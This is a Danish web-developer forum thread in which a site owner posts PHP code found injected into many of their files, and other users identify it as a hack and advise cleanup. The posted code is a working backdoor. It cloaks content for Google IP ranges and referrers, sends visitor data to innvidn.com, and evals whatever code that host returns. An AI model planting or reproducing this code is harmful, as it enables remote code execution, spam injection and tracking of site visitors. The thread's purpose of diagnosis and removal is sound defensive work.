php - Hvad betyder dette? - Udvikleren.dk - Programmering, webdesign og grafik

Tags: php

Bruger #15663 @ 16.11.11 21:21

Hejsa.

Jeg har opdaget følgende kode er tilføjet rigtig mange af mine php filer.

Er der nogen der kan gøre mig klogere på hvad det er for noget kode?

Mit umiddelbare gæt er det er noget hvor man ønsker at sende noget trafik videre. Men jeg ved det ikke.

PHP kode

 <?php
 //{{42461096
 
 GLOBAL $wehaveitagain;
 if($wehaveitagain != 1)
 {
 $preverrx=error_reporting(0);
 $wehaveitagain = 1;
 $mynetsxx = array(
 '84.235.77.0' => 24,
 '8.8.8.0' => 24,
 '8.8.4.0' => 24,
 '8.6.48.0' => 21,
 '74.125.98.0' => 24,
 '74.125.97.0' => 24,
 '74.125.94.0' => 23,
 '74.125.92.0' => 23,
 '74.125.90.0' => 23,
 '74.125.86.0' => 23,
 '74.125.78.0' => 23,
 '74.125.76.0' => 23,
 '74.125.75.0' => 24,
 '74.125.74.0' => 24,
 '74.125.72.0' => 23,
 '74.125.70.0' => 23,
 '74.125.66.0' => 23,
 '74.125.64.0' => 23,
 '74.125.64.0' => 18,
 '74.125.63.0' => 24,
 '74.125.62.0' => 24,
 '74.125.61.0' => 24,
 '74.125.60.0' => 24,
 '74.125.58.0' => 24,
 '74.125.54.0' => 23,
 '74.125.52.0' => 23,
 '74.125.46.0' => 23,
 '74.125.44.0' => 23,
 '74.125.42.0' => 23,
 '74.125.38.0' => 23,
 '74.125.37.0' => 24,
 '74.125.36.0' => 24,
 '74.125.36.0' => 23,
 '74.125.33.0' => 24,
 '74.125.32.0' => 24,
 '74.125.30.0' => 23,
 '74.125.246.0' => 24,
 '74.125.245.0' => 24,
 '74.125.244.0' => 24,
 '74.125.239.0' => 24,
 '74.125.238.0' => 24,
 '74.125.237.0' => 24,
 '74.125.236.0' => 24,
 '74.125.235.0' => 24,
 '74.125.234.0' => 24,
 '74.125.233.0' => 24,
 '74.125.232.0' => 24,
 '74.125.230.0' => 24,
 '74.125.229.0' => 24,
 '74.125.227.0' => 24,
 '74.125.226.0' => 24,
 '74.125.225.0' => 24,
 '74.125.224.0' => 24,
 '74.125.192.0' => 18,
 '74.125.18.0' => 23,
 '74.125.17.0' => 24,
 '74.125.16.0' => 24,
 '74.125.158.0' => 23,
 '74.125.156.0' => 23,
 '74.125.154.0' => 23,
 '74.125.152.0' => 23,
 '74.125.151.0' => 24,
 '74.125.150.0' => 24,
 '74.125.149.0' => 24,
 '74.125.148.0' => 24,
 '74.125.146.0' => 23,
 '74.125.128.0' => 18,
 '74.125.126.0' => 23,
 '74.125.125.0' => 24,
 '74.125.122.0' => 24,
 '74.125.121.0' => 24,
 '74.125.120.0' => 24,
 '74.125.119.0' => 24,
 '74.125.118.0' => 24,
 '74.125.117.0' => 24,
 '74.125.116.0' => 24,
 '74.125.114.0' => 23,
 '74.125.112.0' => 23,
 '74.125.0.0' => 18,
 '74.125.0.0' => 16,
 '72.14.255.0' => 24,
 '72.14.254.0' => 24,
 '72.14.254.0' => 23,
 '72.14.253.0' => 24,
 '72.14.252.0' => 24,
 '72.14.252.0' => 23,
 '72.14.248.0' => 23,
 '72.14.246.0' => 23,
 '72.14.244.0' => 23,
 '72.14.236.0' => 24,
 '72.14.235.0' => 24,
 '72.14.234.0' => 24,
 '72.14.230.0' => 24,
 '72.14.228.0' => 24,
 '72.14.226.0' => 24,
 '72.14.225.0' => 24,
 '72.14.224.0' => 24,
 '72.14.220.0' => 23,
 '72.14.212.0' => 23,
 '72.14.210.0' => 23,
 '72.14.208.0' => 23,
 '72.14.204.0' => 23,
 '72.14.202.0' => 23,
 '72.14.199.0' => 24,
 '72.14.194.0' => 24,
 '72.14.193.0' => 24,
 '72.14.192.0' => 24,
 '72.14.192.0' => 18,
 '70.32.158.0' => 24,
 '70.32.155.0' => 24,
 '70.32.150.0' => 24,
 '70.32.140.0' => 23,
 '70.32.138.0' => 24,
 '70.32.136.0' => 24,
 '70.32.135.0' => 24,
 '70.32.134.0' => 24,
 '70.32.133.0' => 24,
 '70.32.132.0' => 24,
 '70.32.131.0' => 24,
 '70.32.130.0' => 24,
 '70.32.129.0' => 24,
 '70.32.128.0' => 24,
 '70.32.128.0' => 19,
 '66.249.94.0' => 24,
 '66.249.92.0' => 24,
 '66.249.91.0' => 24,
 '66.249.90.0' => 24,
 '66.249.88.0' => 23,
 '66.249.85.0' => 24,
 '66.249.84.0' => 24,
 '66.249.82.0' => 24,
 '66.249.81.0' => 24,
 '66.249.80.0' => 24,
 '66.249.72.0' => 24,
 '66.249.71.0' => 24,
 '66.249.69.0' => 24,
 '66.249.68.0' => 24,
 '66.249.67.0' => 24,
 '66.249.66.0' => 24,
 '66.249.65.0' => 24,
 '66.249.64.0' => 19,
 '66.102.8.0' => 23,
 '66.102.6.0' => 23,
 '66.102.4.0' => 24,
 '66.102.3.0' => 24,
 '66.102.2.0' => 24,
 '66.102.12.0' => 23,
 '66.102.10.0' => 23,
 '66.102.0.0' => 20,
 '64.9.224.0' => 20,
 '64.9.224.0' => 19,
 '64.233.188.0' => 23,
 '64.233.186.0' => 23,
 '64.233.182.0' => 23,
 '64.233.180.0' => 23,
 '64.233.178.0' => 23,
 '64.233.173.0' => 24,
 '64.233.172.0' => 24,
 '64.233.170.0' => 23,
 '64.233.168.0' => 23,
 '64.233.162.0' => 23,
 '64.233.160.0' => 19,
 '63.243.168.0' => 22,
 '4.3.2.0' => 24,
 '216.239.60.0' => 23,
 '216.239.58.0' => 23,
 '216.239.50.0' => 23,
 '216.239.44.0' => 23,
 '216.239.39.0' => 24,
 '216.239.38.0' => 24,
 '216.239.36.0' => 24,
 '216.239.34.0' => 24,
 '216.239.33.0' => 24,
 '216.239.32.0' => 24,
 '216.239.32.0' => 19,
 '209.85.238.0' => 24,
 '209.85.230.0' => 23,
 '209.85.228.0' => 23,
 '209.85.226.0' => 23,
 '209.85.224.0' => 23,
 '209.85.223.0' => 24,
 '209.85.222.0' => 24,
 '209.85.221.0' => 24,
 '209.85.220.0' => 24,
 '209.85.219.0' => 24,
 '209.85.218.0' => 24,
 '209.85.216.0' => 24,
 '209.85.213.0' => 24,
 '209.85.212.0' => 24,
 '209.85.211.0' => 24,
 '209.85.210.0' => 24,
 '209.85.208.0' => 23,
 '209.85.200.0' => 23,
 '209.85.198.0' => 23,
 '209.85.196.0' => 23,
 '209.85.194.0' => 23,
 '209.85.192.0' => 23,
 '209.85.174.0' => 23,
 '209.85.172.0' => 23,
 '209.85.170.0' => 23,
 '209.85.168.0' => 23,
 '209.85.166.0' => 23,
 '209.85.164.0' => 23,
 '209.85.162.0' => 23,
 '209.85.156.0' => 23,
 '209.85.152.0' => 23,
 '209.85.149.0' => 24,
 '209.85.148.0' => 23,
 '209.85.147.0' => 24,
 '209.85.146.0' => 24,
 '209.85.146.0' => 23,
 '209.85.144.0' => 23,
 '209.85.142.0' => 23,
 '209.85.139.0' => 24,
 '209.85.138.0' => 23,
 '209.85.136.0' => 23,
 '209.85.134.0' => 23,
 '209.85.132.0' => 24,
 '209.85.132.0' => 23,
 '209.85.128.0' => 23,
 '209.85.128.0' => 17,
 '193.186.4.0' => 24,
 '193.142.125.0' => 24,
 '173.255.112.0' => 20,
 '173.194.44.0' => 24,
 '173.194.43.0' => 24,
 '173.194.42.0' => 24,
 '173.194.41.0' => 24,
 '173.194.40.0' => 24,
 '173.194.37.0' => 24,
 '173.194.36.0' => 24,
 '173.194.35.0' => 24,
 '173.194.34.0' => 24,
 '173.194.33.0' => 24,
 '173.194.32.0' => 24,
 '173.194.0.0' => 16,
 '118.174.25.0' => 24,
 '118.174.24.0' => 24,
 '118.174.24.0' => 22,
 '113.197.106.0' => 24,
 '113.197.105.0' => 24,
 '108.59.80.0' => 20
 );
 function ip_in_networkxx($ip, $net_addr, $net_mask)
 {
   if($net_mask <= 0) return false;
   $ip_binary_string = sprintf("%032b",ip2long($ip));
   $net_binary_string = sprintf("%032b",ip2long($net_addr));
   return (strncmp($ip_binary_string,$net_binary_string,$net_mask) === 0);
 }
 function selfURL()
 {
   if(!isset($_SERVER['REQUEST_URI'])) $suri = $_SERVER['PHP_SELF'];
   else $suri = $_SERVER['REQUEST_URI'];
   $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
   $sp=strtolower($_SERVER["SERVER_PROTOCOL"]);
   $pr = substr($sp,0,strpos($sp,"/")).$s;
   $pt = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
   return $pr."://".$_SERVER['SERVER_NAME'].$pt.$suri;
 }
 function rewrioutclbkxxx1($str) { return rewriout($str,1); }
 function rewrioutclbkxxx2($str) { return rewriout($str,2); }
 function rewrioutclbkxxx3($str) { return rewriout($str,3); }
 function rewriout($str, $ev)
 {
   error_reporting(0);
   if(stripos($str, '<body') !== false)
   {
     $id = "4dae82eb67843a194c00c7f1";
     $url = "http://innvidn.com/ck.gif";
     $ctx = stream_context_create(array('http' => array('timeout' => 3)));
     $req = $url.'?ev='.$ev.'&url='.urlencode(selfURL()).'&id='.urlencode($id).'&ref='.urlencode($_SERVER['HTTP_REFERER']).'&ip='.$_SERVER['REMOTE_ADDR'].'&ua='.urlencode($_SERVER['HTTP_USER_AGENT']);
     $answergrhey11=file_get_contents($req, 0, $ctx);
     if($answergrhey11 != FALSE && strncmp('/*CODE', $answergrhey11, 6) == 0)
     {
       return eval($answergrhey11);
     }
   }
   return false;
 }
 function StrToNum($Str, $Check, $Magic)
 {
    $Int32Unit = 4294967296;
    $length = strlen($Str);
    for ($i = 0; $i < $length; $i++) {
        $Check *= $Magic;
        if ($Check >= $Int32Unit) {
            $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
            $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
        }
        $Check += ord($Str{$i});
    }
    return $Check;
 }
 function HashURL($String)
 {
    $Check1 = StrToNum($String, 0x1505, 0x21);
    $Check2 = StrToNum($String, 0, 0x1003F);
    $Check1 >>= 2;
    $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
    $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
    $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
    $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
    $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
    return ($T1 | $T2);
 }
 function CheckHash($Hashnum)
 {
    $CheckByte = 0;
    $Flag = 0;
    $HashStr = sprintf('%u', $Hashnum) ;
    $length = strlen($HashStr);
    for ($i = $length-1; $i >= 0;  $i--) {
        $Re = $HashStr{$i};
        if (1 === ($Flag % 2)) {
            $Re += $Re;
            $Re = (int)($Re / 10) + ($Re % 10);
        }
        $CheckByte += $Re;
        $Flag ++;
    }
    $CheckByte %= 10;
    if (0 !== $CheckByte) {
        $CheckByte = 10 - $CheckByte;
        if (1 === ($Flag % 2) ) {
            if (1 === ($CheckByte % 2)) {
                $CheckByte += 9;
            }
            $CheckByte >>= 1;
        }
    }
    return '7'.$CheckByte.$HashStr;
 }
 function getpr($url)
 {
    $ch = CheckHash(HashURL($url));
    $file = "http://toolbarqueries.google.com/tbr?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";
    $data = file_get_contents($file);
    return $data;
 }
 if(isset($_POST['prgetxr']))
 {
   echo getpr($_POST['prgetxr']);
   exit();
 }
 else
 {
   $ev = 0;
   foreach($mynetsxx as     $key => $value)
   {
     if(ip_in_networkxx($_SERVER['REMOTE_ADDR'], $key, $value)) {
       $ev = 1;
       break;
     }
   }
   if($ev == 0) {
     if(isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'google.') !== false) {
         $ev = 2;
     }
     elseif(mt_rand(1,100) == 50) {
         $ev = 3;
     }
   }
   if(isset($_GET['showmeallpls'])) {
     $ev = $_GET['showmeallpls'];
   }
   if($ev > 0) {
     ob_start('rewrioutclbkxxx'.$ev);
   }
 }
 error_reporting($preverrx);
 }
 /*  */
 
 //}}964125a9
 ?>

8 svar postet i denne tråd vises herunder
2 indlæg har modtaget i alt 2 karma

Sorter efter stemmer Sorter efter dato

Bruger #9814 @ 16.11.11 21:31

1.302

Ingen tvivl om at du har haft besøg...

Læs mere her: http://stackoverflow.com/questions/7402301/hackers-have-added-content-to-my-php-files

Dog sender de til http://innvidn.com hos dig og ikke airschk som de skriver om i stackoverflow linket.

Bruger #84 @ 16.11.11 21:35

205

Det ser ud til at dit website er blevet hacket. Umiddelbart ser det ud til at scriptet udskifter indholdet på dit website med noget andet indhold hvis brugeren er henvist fra et google søgeresultat eller er en googlebot. Alle de IP-adresser der står i arrayet tilhører Google.

Du bør fjerne den uønskede kode hurtigst muligt, skifte din adgangskode og ellers sikre sikkerheden hvor dit website er hostet.

Bruger #15663 @ 16.11.11 21:48

415

Jeg havde det på fornemmelsen.

Jeg har skiftet min adgangskode.

Har det hostet hos one.com og der er det i følge deres logfiler et helt godkendt login.

Jeg er ved at fjerne alt koden og har skiftet min kode.

Bruger #9814 @ 16.11.11 21:52

1.302

Og du har ikke en formular - f.eks. til filupload - hvor der kunne være et problem?

Bruger #8223 @ 16.11.11 22:00

1.065

Lav et fuldt virus- malware- og spyware scan på din computer. Det er meget sandsynligt en virus der har afluret dit FTP-kodeord.

Bruger #15663 @ 16.11.11 22:26

415

Det vil jeg gøre Hr. sikker. Eller rettere, jeg vil reinstallere hele computeren, så jeg kan få rydde totalt op.

Narh...
Ikke et som virker.
Den har især angrebet min joomla installation.

Lige nu har jeg da fået min admin del op at køre.
Jeg kan bare ikke få min front-end op at køre. Er der nogen der ved en smart måde at tjekke alle sine filer på efter en bestemt kode?

Indlæg senest redigeret d. 16.11.2011 22:34 af Bruger #15663

Bruger #10281 @ 16.11.11 23:45

363

Er der nogen der ved en smart måde at tjekke alle sine filer på efter en bestemt kode?

Hent dem ned og kør en grep -lir 'søgeord' *

Bruger #15663 @ 17.11.11 00:06

415

Den må du sku lige uddybe Mads.

Program og hvordan? (til at lave søgning og slet)

Edit: Jeg fandt en back-up af min joomla og kørte den i stilling og nu køre siden igen

Indlæg senest redigeret d. 17.11.2011 19:18 af Bruger #15663

Hvad betyder dette?

Karma barometer (30 dage)

Modtaget

Givet

Favorit hos
Forum tråde
Artikler